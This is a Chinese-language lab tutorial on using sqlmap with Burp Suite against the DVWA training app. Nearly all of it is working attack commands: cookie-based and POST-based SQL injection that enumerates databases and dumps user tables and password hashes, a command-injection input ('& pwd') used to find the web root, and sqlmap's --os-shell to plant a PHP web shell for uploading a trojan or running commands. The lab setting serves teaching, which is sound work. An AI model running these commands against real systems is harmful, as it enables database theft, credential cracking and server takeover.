一、利用sqlmap进行Cookie注入
工具: BP、DVWA、sqlmap。
1、首先浏览器打开DVWA的SQL Injection模块,并设置代理。
2、在输入框输入1 ,并抓包。
然后关闭代理
3、进去sqlmap。
eg1:获取当前数据库
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit “ –cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"
eg2:列出当前数据库
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --current-db
eg3:指定数据库猜表
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” -D dvwa --tables
eg4:猜字段
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” -D dvwa -T users --columns
eg5:猜解字段和内容
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” -D dvwa -T users -C “user,password” --dump
二、利用sqlmap进行POST注入
1、在本次实验我们使用的是DVWA中的Brute Force模块
随便输入 然后抓包
-r 跑文件
-p 指定输入参数
eg1:将抓到的包保存为1.txt,并放到C盘根目录下,列数据库
sqlmap.py -r c:\1.txt -p username --dbs
eg2:选定一个名问mysql的数据库,并猜表
sqlmap.py -r c:\1.txt-p username -D mysql --tables
eg3:猜列
sqlmap.py -r c:\1.txt-p username -D mysql -T user --columns
eg4:猜数据
sqlmap.py -r c:\1.txt -p username -D mysql -T user -C “User,Password” --dump
最终我得到的是哈希值,进行解码即可
三、利用sqlmap交互式写shell
1、dvwa选中Command EXecution,模块
输入一个ip地址,这里我输入10.1.1.136 & pwd
获取了一个绝对路径: /opt/lampp/htdocs/vulnerabilities/exec
2、在SQL injection模块,随便输入一个数字,抓包、获取cookie
然后判断用户是否为dba
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --is-dba
结果如下
3、利用sqlmap进行交互式写shell
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --os-shell
这里我选4
4、然后我再选一个2,输入第一步获取的绝对路径
5、打开链接
http://10.1.1.136/vulnerabilities/exec/tmpujhum.php
就可以上传木马、或者执行linux命令